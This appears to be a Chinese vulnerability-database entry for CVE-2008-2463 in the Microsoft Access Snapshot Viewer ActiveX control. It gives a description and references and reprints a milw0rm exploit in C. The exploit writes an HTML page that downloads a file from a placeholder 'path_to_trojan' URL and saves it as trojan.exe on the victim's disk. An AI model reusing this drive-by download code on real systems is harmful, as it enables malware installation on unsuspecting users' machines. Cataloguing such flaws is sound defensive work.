Microsoft Access快照查看器ActiveX控件任意文件下载漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115754 漏洞类型 代码注入
发布时间 2008-07-24 更新时间 2008-10-15
CVE编号 CVE-2008-2463 CNNVD-ID CNNVD-200807-096
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6124
https://www.securityfocus.com/bid/30114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-096
|漏洞详情
MicrosoftAccess是美国微软(Microsoft)公司Office套件中的一套关系数据库管理系统。MicrosoftAccess中捆绑了快照查看器ActiveX控件用于方便的查看Access报表快照,该控件没有正确地验证某些输入参数。如果用户受骗访问了恶意站点的话,就可能导致将站点上的文件下载到用户机器的任意位置。目前这个漏洞正在被积极的利用。
|漏洞EXP
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        char *b0fer;

        if ( (File = fopen(Filename,"w")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        b0fer = (char*)malloc(strlen(data));

        fwrite(data, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

// milw0rm.com [2008-07-24]
|受影响的产品
Microsoft Snapshot Viewer for Microsoft Access 0 Microsoft Access 2003 SP3 + Microsoft Office XP SP2 + Microsoft Office XP SP2
|参考资料

来源:US-CERT
名称:TA08-225A
链接:http://www.us-cert.gov/cas/techalerts/TA08-225A.html
来源:US-CERT
名称:TA08-189A
链接:http://www.us-cert.gov/cas/techalerts/TA08-189A.html
来源:US-CERT
名称:VU#837785
链接:http://www.kb.cert.org/vuls/id/837785
来源:XF
名称:microsoft-snapshotviewer-code-execution(43613)
链接:http://xforce.iss.net/xforce/xfdb/43613
来源:SECTRACK
名称:1020433
链接:http://www.securitytracker.com/id?1020433
来源:BID
名称:30114
链接:http://www.securityfocus.com/bid/30114
来源:www.microsoft.com
链接:http://www.microsoft.com/technet/security/advisory/955179.mspx
来源:VUPEN
名称:ADV-2008-2012
链接:http://www.frsirt.com/english/advisories/2008/2012/references
来源:SECUNIA
名称:30883
链接:http://secunia.com/advisories/30883
来源:OVAL
名称:oval:org.mitre.oval:def:6120
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6120
来源:HP
名称:HPSBST02360
链接:http://marc.info/?l=bugtraq&m=121915960406986&w=2
来源:HP
名称:HPSBST02360
链接:http://marc.info/?l=bugtraq&m=121915960406986&w=2